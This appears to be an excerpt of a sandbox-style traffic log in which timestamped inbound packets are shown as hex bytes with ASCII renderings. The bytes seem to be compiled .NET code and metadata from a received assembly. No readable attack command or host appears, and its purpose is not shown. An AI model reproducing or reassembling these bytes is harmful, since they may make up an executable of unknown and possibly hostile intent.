2023-11-18 09:02:37 UTC	606	IN	Data Raw: 28 0d 00 00 2b 6f 66 00 00 0a 28 0e 00 00 2b 03 6f 9a 00 00 0a 28 fb 00 00 06 0c 08 2c 37 02 07 03 6f 97 00 00 0a 6f e5 00 00 0a 03 6f 97 00 00 0a 6f e6 00 00 0a 16 12 00 28 e6 00 00 06 0d 02 09 03 6f 97 00 00 0a 6f e5 00 00 0a 06 16 28 e3 00 00 06 2b 02 07 0d 6f 6a 00 00 0a 6f e9 00 00 0a 8c 36 00 00 1b 13 04 11 04 6f 13 00 00 0a 26 7e ea 00 00 0a 13 05 03 6f 99 00 00 0a 6f d1 00 00 0a 13 06 38 42 01 00 00 11 06 6f d2 00 00 0a 11 04 6f eb 00 00 0a 6f 34 00 00 0a 28 f2 00 00 06 13 07 09 6f 0b 01 00 06 11 05 6f 46 00 00 06 02 6f 06 00 00 2b 13 08 08 2d 54 09 6f 08 01 00 06 11 05 6f 46 00 00 06 09 6f 08 01 00 06 6f 47 00 00 06 09 6f 08 01 00 06 11 08 6f 46 00 00 06 09 6f 08 01 00 06 72 62 0a 00 70 6f 46 00 00 06 09 6f 08 01 00 06 11 07 6f 46 00 00 06 09 6f Data Ascii: (+of(+o(,7oooo(oo(+ojo6o&~oo8Booo4(ooFo+-TooFooGooForbpoFooFo
2023-11-18 09:02:37 UTC	608	IN	Data Raw: 2c 0d 06 6f b8 00 00 0a 02 6f 06 00 00 2b 2a 03 6f b8 00 00 0a 75 38 00 00 01 0b 07 2c 09 02 07 17 28 be 00 00 06 2a 03 6f b8 00 00 0a 75 52 00 00 01 0c 08 2c 09 02 08 17 28 c0 00 00 06 2a 03 6f b8 00 00 0a 75 51 00 00 01 0d 09 2c 22 09 6f bc 00 00 0a 1f 0d 33 18 02 72 cc 09 00 70 09 6f 90 00 00 0a 09 6f 91 00 00 0a 28 bc 00 00 06 2a 73 4a 00 00 06 25 72 18 0b 00 70 6f 46 00 00 06 25 03 6f b8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 46 73 4a 00 00 06 25 72 26 0b 00 70 6f 46 00 00 06 2a 00 00 00 13 30 04 00 27 00 00 00 19 00 00 11 14 0a 02 03 12 00 28 8f 00 00 06 2c 02 06 2a 02 72 e4 08 00 70 03 6f 90 00 00 0a 03 6f 91 00 00 0a 28 bc 00 00 06 2a 72 73 4a 00 00 06 25 72 30 0b 00 70 03 6f f3 00 00 0a 28 f4 00 00 0a 6f 46 Data Ascii: ,oo+ou8,(ouR,(ouQ,"o3rpoo(sJ%rpoF%oo+oF%rpoFFsJ%r&poF0'(,rpoo(rsJ%r0po(oF
2023-11-18 09:02:37 UTC	609	IN	Data Raw: 00 00 0a 7a 02 17 7d 1b 00 00 04 02 7b 1a 00 00 04 03 6f fa 00 00 0a 6f 3c 01 00 06 0a 02 28 81 00 00 06 6f 02 01 00 06 06 6f fb 00 00 0a 2d 12 02 28 81 00 00 06 6f 03 01 00 06 06 17 6f fc 00 00 0a 06 2a 00 00 13 30 03 00 5a 00 00 00 2d 00 00 11 73 4a 00 00 06 0a 03 75 7b 00 00 01 0b 07 2d 06 73 c9 00 00 0a 7a 02 06 07 6f fd 00 00 0a 28 f9 00 00 06 06 72 d3 00 00 70 6f 46 00 00 06 07 0c 08 2c 13 08 6f fe 00 00 0a 2c 0b 06 72 74 0b 00 70 6f 46 00 00 06 06 04 6f 46 00 00 06 06 72 d7 00 00 70 6f 46 00 00 06 06 2a 00 00 13 30 03 00 79 00 00 00 12 00 00 11 73 4a 00 00 06 0a 02 04 28 ee 00 00 06 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 04 02 6f 06 00 00 2b 6f 46 00 00 06 02 04 28 ee 00 00 06 2c 0b 06 72 d7 00 00 70 6f 46 00 00 06 06 03 6f 46 00 00 06 02 05 28 Data Ascii: z}{oo<(oo-(oo0Z-sJu{-szo(rpoF,o,rtpoFoFrpoF0ysJ(,rpoFo+oF(,rpoFoF(
2023-11-18 09:02:37 UTC	610	IN	Data Raw: ed 00 00 06 2d 0f 02 11 05 6f 24 00 00 0a 28 eb 00 00 06 2b 07 17 2b 04 16 2b 01 17 13 06 02 7b 17 00 00 04 11 06 2d 03 16 2b 01 17 6f 04 01 00 0a 06 6f 02 01 00 06 6f 47 00 00 0a 13 07 11 05 6f 24 00 00 0a 02 6f 06 00 00 2b 13 08 02 7b 17 00 00 04 6f 05 01 00 0a 26 02 11 08 06 11 05 11 07 28 c2 00 00 06 05 0b 16 0c 11 04 17 58 13 04 11 04 09 3f 34 ff ff ff 04 1f 10 2e 0a 04 1f 15 2e 05 04 1f 1b 33 3b 06 6f 09 01 00 06 72 82 0c 00 70 6f 46 00 00 06 02 7b 17 00 00 04 16 6f 04 01 00 0a 06 6f 09 01 00 06 0e 04 02 6f 06 00 00 2b 6f 46 00 00 06 02 7b 17 00 00 04 6f 05 01 00 0a 26 02 7b 1a 00 00 04 6f 3a 01 00 06 02 28 82 00 00 06 2d 0c 02 7b 16 00 00 04 6f ee 00 00 0a 26 06 2a 00 13 30 04 00 cf 01 00 00 31 00 00 11 14 0a 04 03 3b 42 01 00 00 03 75 0c 00 00 02 Data Ascii: -o$(+++{-+oooGo$o+{o&(X?4..3;orpoF{ooo+oF{o&{o:(-{o&*01;Bu
2023-11-18 09:02:37 UTC	612	IN	Data Raw: 00 00 00 36 02 7e 1c 00 00 04 03 28 cc 00 00 06 2a 36 02 7e 1d 00 00 04 03 28 cc 00 00 06 2a de 03 04 6f 08 01 00 0a 6f cd 00 00 0a 6f 09 01 00 0a 2d 0b 72 42 0d 00 70 73 71 00 00 0a 7a 03 04 6f 08 01 00 0a 6f cd 00 00 0a 6f 0a 01 00 0a 02 04 6f c5 01 00 06 2a 13 30 04 00 bb 00 00 00 12 00 00 11 73 4a 00 00 06 0a 03 6f 96 00 00 0a 6f d9 00 00 0a 17 31 34 04 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 04 2c 0b 06 72 d7 00 00 70 6f 46 00 00 06 06 72 7e 0c 00 70 6f 46 00 00 06 06 7e 1e 00 00 04 03 6f 08 01 00 0a 6f cd 00 00 0a 6f 0b 01 00 0a 6f 46 00 00 06 06 72 7e 0c 00 70 6f 46 00 00 06 04 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 03 6f 96 00 00 0a 6f d9 00 00 0a 17 59 6f Data Ascii: 6~(6~(ooo-rBpsqzoooo*0sJoo14,rpoFooo+oF,rpoFr~poF~ooooFr~poF,rpoFoooYo
2023-11-18 09:02:37 UTC	613	IN	Data Raw: 06 00 00 2b 28 70 00 00 0a 6f 46 00 00 06 2b 18 07 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 07 72 b1 11 00 70 6f 46 00 00 06 07 2a 36 02 03 72 92 15 00 70 6f c8 00 00 06 2a 46 73 4a 00 00 06 25 72 a6 15 00 70 6f 46 00 00 06 2a d2 73 4a 00 00 06 25 72 c4 15 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 13 30 03 00 74 00 00 00 12 00 00 11 73 4a 00 00 06 0a 06 72 d4 15 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 03 6f 96 00 00 0a 6f d9 00 00 0a 18 33 30 06 72 39 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 17 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 06 72 d7 00 00 70 6f 46 00 00 06 2b 0b 06 72 Data Ascii: +(poF+ooo+oFrpoF6rpoFsJ%rpoFsJ%rpoF%ooo+oF%rpoF0tsJrpoFooo+oFoo30r9poFooo+oFrpoF+r
2023-11-18 09:02:37 UTC	614	IN	Data Raw: 00 0a 0a 28 49 00 00 0a 73 11 01 00 0a 0b 7e ea 00 00 0a 0c 03 6f 08 01 00 06 6f 48 00 00 06 2d 06 72 39 00 00 70 0c 03 6f 02 01 00 06 6f 4b 00 00 0a 0d 2b 16 12 03 28 4c 00 00 0a 13 04 02 03 11 04 06 07 12 02 28 e0 00 00 06 12 03 28 4f 00 00 0a 2d e1 de 0e 12 03 fe 16 0f 00 00 1b 6f 12 00 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 36 00 23 59 00 0e 00 00 00 00 2e 02 03 04 05 17 28 e3 00 00 06 2a 13 30 03 00 68 00 00 00 00 00 00 00 03 6f 02 01 00 06 6f 47 00 00 0a 2c 0f 05 03 6f 02 01 00 06 16 6f ff 00 00 0a 2e 3a 03 6f 02 01 00 06 05 6f 4e 00 00 0a 03 6f 09 01 00 06 72 62 0a 00 70 6f 46 00 00 06 03 6f 09 01 00 06 05 6f 46 00 00 06 02 7b 18 00 00 04 05 6f 30 01 00 06 16 6f 0e 01 00 0a 0e 04 2c 0d 02 7b 1a 00 00 04 04 05 6f 3b 01 00 06 2a 1b 30 03 00 88 00 Data Ascii: (Is~ooH-r9pooK+(L((O-o6#Y.(0hooG,oo.:ooNorbpoFooF{o0o,{o;*0
2023-11-18 09:02:37 UTC	616	IN	Data Raw: 86 03 6f bc 00 00 0a 1f 2e 2e 15 03 6f bc 00 00 0a 1f 38 2e 0b 03 6f bc 00 00 0a 1f 2b fe 01 2a 17 2a aa 1d 03 6f bc 00 00 0a 2e 1f 1f 10 03 6f bc 00 00 0a 2e 15 1f 15 03 6f bc 00 00 0a 2e 0b 1f 1b 03 6f bc 00 00 0a fe 01 2a 17 2a 00 00 00 13 30 02 00 19 00 00 00 3d 00 00 11 03 6f bc 00 00 0a 0a 06 1b 2e 0a 06 1f 2b 2e 05 06 1f 2e 33 02 16 2a 17 2a 00 00 00 13 30 02 00 5c 01 00 00 00 00 00 00 04 1f 14 30 26 04 1f 0b 30 12 04 1f 09 2e 4b 04 1f 0b 3b bf 00 00 00 38 3a 01 00 00 04 1f 0f 2e 4f 04 1f 14 2e 7d 38 2b 01 00 00 04 1f 2d 30 15 04 1f 1f 3b 9e 00 00 00 04 1f 2d 3b a0 00 00 00 38 11 01 00 00 04 1f 33 3b ae 00 00 00 04 1f 34 3b d9 00 00 00 38 fc 00 00 00 03 6f 04 01 00 06 2d 0c 03 6f 0c 01 00 06 6f 48 00 00 06 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 Data Ascii: o..o8.o+o.o.o.o0=o.+..30\0&0.K;8:.O.}8+-0;-;83;4;8o-ooHooH
2023-11-18 09:02:37 UTC	616	IN	Data Raw: 00 00 06 2c 17 03 6f 0c 01 00 06 6f 48 00 00 06 2c 0a 03 6f 04 01 00 06 14 fe 01 2a 16 2a 03 6f 04 01 00 06 14 fe 01 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 0c 03 6f 0b 01 00 06 6f 48 00 00 06 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 24 03 6f 0b 01 00 06 6f 48 00 00 06 2c 17 03 6f 0c 01 00 06 6f 48 00 00 06 2c 0a 03 6f fe 00 00 06 16 fe 01 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 19 03 6f 0b 01 00 06 6f 48 00 00 06 2c 0c 03 6f 0c 01 00 06 6f 48 00 00 06 2a 16 2a 73 88 00 00 0a 7a 96 03 6f bc 00 00 0a 1b 33 13 04 02 03 74 54 00 00 01 6f 1a 01 00 0a 6f 46 00 00 06 2a 02 03 04 28 f1 00 00 06 2a ee 02 03 28 ee 00 00 06 2c 24 04 72 d3 00 00 70 6f 46 00 00 06 04 03 02 6f 06 00 00 2b 6f 46 00 00 06 04 72 d7 00 00 70 6f 46 00 00 06 2a 04 03 02 6f 06 00 00 Data Ascii: ,ooH,o*oooH,ooHooH,$ooH,ooH,oooH,ooH,ooH*szo3tTooF((,$rpoFo+oFrpoFo
2023-11-18 09:02:37 UTC	617	IN	Data Raw: 2a 6a 02 7b 23 00 00 04 2d 0b 02 73 46 00 00 0a 7d 23 00 00 04 02 7b 23 00 00 04 2a 6a 02 7b 24 00 00 04 2d 0b 02 73 1e 01 00 0a 7d 24 00 00 04 02 7b 24 00 00 04 2a 1e 02 7b 25 00 00 04 2a 22 02 03 7d 25 00 00 04 2a 1e 02 7b 26 00 00 04 2a 22 02 03 7d 26 00 00 04 2a 1e 02 7b 27 00 00 04 2a 1e 02 7b 28 00 00 04 2a 6a 02 7b 29 00 00 04 2d 0b 02 73 4a 00 00 06 7d 29 00 00 04 02 7b 29 00 00 04 2a 6a 02 7b 2a 00 00 04 2d 0b 02 73 4a 00 00 06 7d 2a 00 00 04 02 7b 2a 00 00 04 2a 6a 02 7b 2b 00 00 04 2d 0b 02 73 4a 00 00 06 7d 2b 00 00 04 02 7b 2b 00 00 04 2a 1e 02 7b 2c 00 00 04 2a 22 02 03 7d 2c 00 00 04 2a b6 02 7b 2b 00 00 04 2c 0f 02 7b 2b 00 00 04 6f 48 00 00 06 2d 02 17 2a 02 7b 25 00 00 04 2c 02 17 2a 02 7b 26 00 00 04 2c 02 17 2a 16 2a 00 00 1b 30 03 00 Data Ascii: j{#-sF}#{#j{$-s}${${%"}%{&"}&{'{(j{)-sJ}){)j{-sJ}{*j{+-sJ}+{+{,"},{+,{+oH-{%,{&,**0
2023-11-18 09:02:37 UTC	619	IN	Data Raw: 00 0a dc 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 33 00 30 63 00 0a 00 00 00 00 c2 02 6f df 00 00 0a 1f 0a 58 18 58 73 20 00 00 0a 02 6f 22 00 00 0a 1f 5b 6f 2f 01 00 0a 03 6f 30 01 00 0a 1f 5d 6f 2f 01 00 0a 6f 2f 00 00 0a 2a 36 28 7f 00 00 0a 02 03 28 31 01 00 0a 2a 42 02 28 7f 00 00 0a 03 04 6f 32 01 00 0a 26 02 2a 13 30 02 00 21 00 00 00 40 00 00 11 02 6f 26 00 00 0a 26 16 0a 2b 10 02 72 42 18 00 70 6f 22 00 00 0a 26 06 17 58 0a 06 03 32 ec 02 2a 7e 28 7f 00 00 0a 72 4e 03 00 70 17 8d 12 00 00 01 25 16 02 8c 19 00 00 1b a2 28 31 01 00 0a 2a 22 02 16 28 1e 01 00 06 2a 00 00 13 30 02 00 26 00 00 00 40 00 00 11 02 2c 21 03 0a 2b 14 02 06 6f 33 01 00 0a 28 34 01 00 0a 2d 02 16 2a 06 17 58 0a 06 02 6f df 00 00 0a 32 e3 17 2a 00 00 13 30 02 00 2f 00 00 00 40 Data Ascii: o/30coXXs o"[o/o0]o/o/6((1B(o2&0!@o&&+rBpo"&X2~(rNp%(1"(0&@,!+o3(4-Xo2*0/@
2023-11-18 09:02:37 UTC	620	IN	Data Raw: 01 00 0a 2a 32 02 28 4c 01 00 06 73 42 01 00 0a 2a 32 02 28 4c 01 00 06 73 43 01 00 0a 2a 32 02 28 4c 01 00 06 73 44 01 00 0a 2a 32 02 28 4c 01 00 06 73 45 01 00 0a 2a 32 02 28 4c 01 00 06 73 46 01 00 0a 2a 13 30 07 00 b5 00 00 00 47 00 00 11 03 d0 91 00 00 01 28 47 01 00 0a 28 48 01 00 0a 2d 12 03 d0 90 00 00 01 28 47 01 00 0a 28 48 01 00 0a 2c 55 7e 41 00 00 04 0a 28 49 01 00 0a 2c 46 28 4a 01 00 0a 72 78 18 00 70 18 8d 12 00 00 01 25 16 06 2d 07 72 fb 18 00 70 2b 06 06 6f 2f 00 00 0a a2 25 17 03 14 28 4b 01 00 0a 2d 07 72 fb 18 00 70 2b 06 03 6f 2f 00 00 0a a2 28 4c 01 00 0a 28 4d 01 00 0a 06 2a 28 49 01 00 0a 2c 33 28 4a 01 00 0a 72 09 19 00 70 17 8d 12 00 00 01 25 16 03 14 28 4b 01 00 0a 2d 07 72 fb 18 00 70 2b 06 03 6f 2f 00 00 0a a2 28 4c 01 00 0a Data Ascii: 2(LsB2(LsC2(LsD2(LsE2(LsF0G(G(H-(G(H,U~A(I,F(Jrxp%-rp+o/%(K-rp+o/(L(M*(I,3(Jrp%(K-rp+o/(L
2023-11-18 09:02:37 UTC	621	IN	Data Raw: 00 00 06 72 5e 17 00 70 28 7b 00 00 0a 3a ad 00 00 00 38 61 01 00 00 06 72 54 17 00 70 28 7b 00 00 0a 3a 98 00 00 00 38 4c 01 00 00 06 72 9f 1b 00 70 28 7b 00 00 0a 3a 8a 00 00 00 38 37 01 00 00 06 72 af 1b 00 70 28 7b 00 00 0a 3a 90 00 00 00 38 22 01 00 00 06 72 b9 1b 00 70 28 7b 00 00 0a 3a 96 00 00 00 38 0d 01 00 00 06 72 cb 1b 00 70 28 7b 00 00 0a 3a 99 00 00 00 38 f8 00 00 00 06 72 d7 1b 00 70 28 7b 00 00 0a 3a 9c 00 00 00 38 e3 00 00 00 06 72 e1 1b 00 70 28 7b 00 00 0a 3a 9c 00 00 00 38 ce 00 00 00 06 72 02 17 00 70 28 7b 00 00 0a 3a ad 00 00 00 38 b9 00 00 00 07 28 61 01 00 0a 2a 1f 0c 13 06 03 12 02 28 d5 01 00 06 16 fe 01 13 05 16 0d 16 13 04 38 a8 00 00 00 1f 0c 13 06 03 12 02 28 d5 01 00 06 16 fe 01 13 05 16 0d 17 13 04 38 8d 00 00 00 1f 0c 13 Data Ascii: r^p({:8arTp({:8Lrp({:87rp({:8"rp({:8rp({:8rp({:8rp({:8rp({:8(a*(8(8
2023-11-18 09:02:37 UTC	622	IN	Data Raw: 16 13 04 2b 48 03 12 08 28 d4 01 00 06 2c 15 03 12 09 28 d6 01 00 06 2c 0b 07 11 08 11 09 28 62 01 00 0a 2a 07 28 63 01 00 0a 2a 07 12 0a fe 15 49 00 00 1b 11 0a 28 64 01 00 0a 2a 72 3f 1b 00 70 06 28 70 00 00 0a 73 42 00 00 0a 7a 11 06 2c 1f 11 06 1f 0c 33 30 11 05 2d 0b 07 09 11 04 08 28 65 01 00 0a 2a 07 09 11 04 28 66 01 00 0a 2a 11 05 2d 0a 07 11 04 08 28 67 01 00 0a 2a 07 11 04 28 68 01 00 0a 2a 72 3f 1b 00 70 06 28 70 00 00 0a 73 42 00 00 0a 7a 13 30 04 00 d8 03 00 00 4a 00 00 11 03 2d 0b 72 f1 1b 00 70 73 1c 01 00 0a 7a 03 6f 65 00 00 0a 75 7e 00 00 01 0a 06 2d 11 72 3f 1b 00 70 03 28 70 00 00 0a 73 60 01 00 0a 7a 03 6f 72 00 00 0a 0b 06 6f 6c 00 00 0a 0c 08 45 0d 00 00 00 e8 00 00 00 05 00 00 00 1b 00 00 00 30 03 00 00 b5 00 00 00 89 00 00 00 73 Data Ascii: +H(,(,(b(cI(dr?p(psBz,30-(e(f-(g(h*r?p(psBz0J-rpszoeu~-r?p(ps`zorolE0s
2023-11-18 09:02:37 UTC	623	IN	Data Raw: 2c 29 03 74 14 00 00 02 11 07 6f 78 01 00 0a 11 07 6f 79 01 00 0a 11 07 6f 7a 01 00 0a 7e 7b 01 00 0a 28 5f 01 00 06 13 06 2b 21 03 74 14 00 00 02 12 05 28 76 01 00 0a 12 05 28 7c 01 00 0a 16 7e 7b 01 00 0a 28 5f 01 00 06 13 06 06 6f 7d 01 00 0a 11 06 6f 7e 01 00 0a 26 11 04 6f 13 00 00 0a 3a 79 ff ff ff de 0c 11 04 2c 07 11 04 6f 12 00 00 0a dc 07 2c 66 16 07 6f 7f 01 00 0a 2f 5d 04 75 1a 00 00 01 2d 1b 04 75 13 00 00 01 2d 13 04 75 19 00 00 01 2d 0b 72 e2 1d 00 70 73 71 00 00 0a 7a 07 6f 80 01 00 0a 13 08 2b 17 12 08 28 81 01 00 0a 13 09 06 6f 7d 01 00 0a 11 09 6f 82 01 00 0a 26 12 08 28 83 01 00 0a 2d e0 de 0e 12 08 fe 16 4f 00 00 1b 6f 12 00 00 0a dc 06 13 0a de 09 26 06 6f 84 01 00 0a fe 1a 11 0a 2a 00 41 4c 00 00 02 00 00 00 62 00 00 00 8b 00 00 00 Data Ascii: ,)toxoyoz~{(_+!t(v(\|~{(_o}o~&o:y,o,fo/]u-u-u-rpsqzo+(o}o&(-Oo&o*ALb
2023-11-18 09:02:37 UTC	624	IN	Data Raw: 6f 13 00 00 0a 2d a6 de 15 11 06 75 62 00 00 01 13 0a 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 06 72 d7 00 00 70 6f 22 00 00 0a 26 08 06 6f 2f 00 00 0a 6f 70 01 00 0a 08 6f 98 01 00 0a 26 08 72 7a 1f 00 70 07 05 6f 9a 01 00 0a 28 70 00 00 0a 6f 70 01 00 0a 08 73 a4 01 00 0a 13 0b 07 11 0b 6f a5 01 00 0a 11 0b 09 6f a6 01 00 0a 26 04 6f 94 01 00 0a 6f 9e 01 00 0a 13 06 2b 21 11 06 6f 16 00 00 0a 74 d3 00 00 01 6f a7 01 00 0a 13 0c 09 6f 94 01 00 0a 11 0c 6f a8 01 00 0a 26 11 06 6f 13 00 00 0a 2d d6 de 15 11 06 75 62 00 00 01 13 0a 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 11 0b 09 6f a9 01 00 0a 26 de 20 11 0b 2c 07 11 0b 6f 12 00 00 0a dc 09 2c 06 09 6f 12 00 00 0a dc 08 2c 06 08 6f 12 00 00 0a dc 2a 00 41 7c 00 00 02 00 00 00 4d 00 00 00 5e 00 00 00 ab 00 00 00 15 Data Ascii: o-ub,orpo"&o/opo&rzpo(popsoo&oo+!otooo&o-ub,oo& ,o,o,o*A\|M^
2023-11-18 09:02:37 UTC	626	IN	Data Raw: 03 6f 9c 00 00 0a 6f 98 01 00 06 2a ce 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f 9e 00 00 0a 6f 97 01 00 06 02 03 6f 9f 00 00 0a 6f 97 01 00 06 02 03 6f a0 00 00 0a 6f 97 01 00 06 2a 9e 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f a1 00 00 0a 6f 97 01 00 06 02 03 6f f1 00 00 0a 6f 97 01 00 06 2a 3e 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 2a ce 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f a3 00 00 0a 6f 99 01 00 06 02 03 6f a4 00 00 0a 6f 97 01 00 06 02 03 6f a3 00 00 0a 6f 98 01 00 06 2a ce 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f a6 00 00 0a 6f 99 01 00 06 02 03 6f a7 00 00 0a 6f 97 01 00 06 02 03 6f a6 00 00 0a 6f 98 01 00 06 2a 6e 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f a8 00 00 0a 6f 97 01 00 06 2a 00 1b 30 Data Ascii: oo-rJ ps`zoooooo-rJ ps`zoooo>-rJ ps`z-rJ ps`zoooooo-rJ ps`zoooooon-rJ ps`zoo*0
2023-11-18 09:02:37 UTC	627	IN	Data Raw: 7d be 01 00 0a 2a 00 00 1b 30 02 00 1b 00 00 00 40 00 00 11 02 7b bc 01 00 0a 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 bf 01 00 0a dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 03 00 9e 00 00 00 59 00 00 11 02 7b bc 01 00 0a 0b 07 2c 0b 07 17 2e 5c 16 0a dd 87 00 00 00 02 15 7d bc 01 00 0a 02 7b 59 00 00 0a 7b 51 00 00 0a 02 7b c0 01 00 0a 12 02 6f 52 00 00 0a 2c 5b 02 08 6f c1 01 00 0a 7d c2 01 00 0a 02 1f fd 7d bc 01 00 0a 2b 26 02 7c c2 01 00 0a 28 c3 01 00 0a 0d 02 09 7d c4 01 00 0a 02 17 7d bc 01 00 0a 17 0a de 32 02 1f fd 7d bc 01 00 0a 02 7c c2 01 00 0a 28 c5 01 00 0a 2d cd 02 28 bf 01 00 0a 02 7c c2 01 00 0a fe 15 57 00 00 1b 16 0a de 07 02 28 c6 01 00 0a dc 06 2a 00 00 01 10 00 00 04 00 00 00 95 95 00 07 00 00 00 00 66 02 15 Data Ascii: }0@{.3(0Y{,.\}{Y{Q{oR,[o}}+&\|(}}2}\|(-(\|W(*f
2023-11-18 09:02:37 UTC	627	IN	Data Raw: 00 0a 1f fe 33 18 02 7b be 01 00 0a 28 bd 01 00 0a 33 0b 02 16 7d bc 01 00 0a 02 0a 2b 13 16 73 58 00 00 0a 0a 06 02 7b 59 00 00 0a 7d 59 00 00 0a 06 02 7b 5a 00 00 0a 7d c0 01 00 0a 06 2a 1e 02 28 c7 01 00 0a 2a 66 02 28 44 00 00 0a 02 03 7d c8 01 00 0a 02 28 bd 01 00 0a 7d c9 01 00 0a 2a 00 00 00 1b 30 02 00 33 00 00 00 40 00 00 11 02 7b c8 01 00 0a 0a 06 1f fc 2e 09 06 1f fd 2e 04 06 17 33 1d 00 06 1f fc 2e 06 06 17 2e 02 de 11 00 de 0e 02 28 ca 01 00 0a dc 02 28 cb 01 00 0a dc 2a 00 01 1c 00 00 02 00 22 00 02 24 00 07 00 00 00 00 02 00 16 00 15 2b 00 07 00 00 00 00 1b 30 03 00 d0 00 00 00 5b 00 00 11 02 7b c8 01 00 0a 0b 07 2c 0b 07 17 2e 79 16 0a dd b9 00 00 00 02 15 7d c8 01 00 0a 02 02 7b 63 00 00 0a 6f 5e 00 00 0a 6f 5f 00 00 0a 7d cc 01 00 0a 02 Data Ascii: 3{(3}+sX{Y}Y{Z}(f(D}(}03@{..3..(("$+0[{,.y}{co^o_}
2023-11-18 09:02:37 UTC	629	IN	Data Raw: 00 00 00 2e 00 00 00 3c 00 00 00 10 00 00 00 58 00 00 00 01 00 00 00 01 00 00 00 07 00 00 00 05 00 00 00 0a 00 00 00 0e 00 00 00 13 00 00 00 01 00 00 00 00 00 ad 16 01 00 00 00 00 00 06 00 ba 10 65 28 06 00 8e 11 65 28 06 00 ba 0f ba 27 0f 00 be 28 00 00 06 00 fb 0f 13 1f 06 00 9d 10 13 1f 06 00 75 11 13 1f 06 00 f7 10 13 1f 06 00 10 11 13 1f 06 00 7e 10 13 1f 06 00 e7 0f 1c 28 06 00 2b 11 82 18 06 00 92 35 b0 22 06 00 90 23 b0 22 06 00 da 10 b0 22 06 00 61 10 13 1f 06 00 30 10 7e 13 06 00 e5 2d 82 18 0a 00 bd 05 cd 28 06 00 31 01 da 02 0e 00 82 25 d4 22 06 00 89 24 f4 34 06 00 0c 01 da 02 0a 00 13 0e cd 28 0a 00 d1 05 cd 28 0a 00 15 06 cd 28 0a 00 3d 0e cd 28 0a 00 94 23 45 18 0a 00 7b 0d 45 18 0a 00 91 00 45 18 0a 00 6d 04 45 18 7b 00 24 27 00 00 0a 00 Data Ascii: .<Xe(e('(u~(+5"#""a0~-(1%"$4(((=(#E{EEmE{$'
2023-11-18 09:02:37 UTC	630	IN	Data Raw: 49 00 02 00 09 00 a0 00 00 00 a4 30 61 23 00 00 02 00 0e 00 00 01 10 00 38 17 61 23 3c 00 02 00 0f 00 00 01 10 00 7b 01 61 23 0c 00 07 00 18 00 80 01 10 00 e3 2b 61 23 49 00 08 00 24 00 00 00 10 00 28 0e 61 23 49 00 13 00 41 00 00 01 10 00 a5 24 61 23 49 00 14 00 45 00 00 01 10 00 f5 24 61 23 0e 00 15 00 4b 00 00 01 10 00 32 27 61 23 12 00 15 00 81 00 00 01 10 00 4d 30 61 23 49 00 21 00 fe 00 00 00 10 00 fd 25 61 23 09 02 2d 00 12 01 80 01 10 00 a2 16 61 23 49 00 2f 00 17 01 00 00 10 00 3c 17 61 23 49 00 30 00 2b 01 00 00 10 00 84 26 61 23 49 00 36 00 37 01 00 01 10 00 43 07 61 23 49 00 38 00 39 01 00 00 10 00 33 0e 61 23 49 00 39 00 3e 01 01 01 10 00 ce 36 61 23 11 02 3b 00 43 01 00 01 10 00 f6 32 61 23 2d 02 3d 00 50 01 00 01 10 00 4e 28 61 23 41 02 41 Data Ascii: I0a#8a#<{a#+a#I$(a#IA$a#IE$a#K2'a#M0a#I!%a#-a#I/<a#I0+&a#I67Ca#I893a#I9>6a#;C2a#-=PN(a#AA
2023-11-18 09:02:37 UTC	631	IN	Data Raw: 00 83 00 c8 35 83 02 24 00 cc 28 00 00 00 00 83 00 b8 35 46 01 25 00 dc 28 00 00 00 00 c3 02 68 14 3c 0f 26 00 70 29 00 00 00 00 83 00 c2 35 8f 0f 27 00 9b 29 00 00 00 00 83 08 11 2a 9d 0f 29 00 ab 29 00 00 00 00 83 08 62 2d 67 02 29 00 b8 29 00 00 00 00 83 08 29 2c a7 0f 29 00 c0 29 00 00 00 00 93 00 ed 0b bc 0f 29 00 cd 29 00 00 00 00 93 00 b8 06 c5 0f 2a 00 e9 29 00 00 00 00 93 00 4c 29 ce 0f 2b 00 f8 29 00 00 00 00 93 00 4c 29 dc 0f 2c 00 45 2a 00 00 00 00 93 00 10 0c ea 0f 2d 00 52 2a 00 00 00 00 93 00 10 0c f1 0f 2e 00 5d 2a 00 00 00 00 93 00 ba 0b ea 0f 2f 00 6a 2a 00 00 00 00 93 00 ba 0b f1 0f 30 00 76 2a 00 00 00 00 93 00 62 0c ea 0f 31 00 83 2a 00 00 00 00 93 00 62 0c f1 0f 32 00 8f 2a 00 00 00 00 93 00 67 04 f8 0f 33 00 c4 2a 00 00 00 00 93 00 Data Ascii: 5$(5F%(h<&p)5')))b-g))),)))))L)+)L),E-R.]/j0vb1b2g3
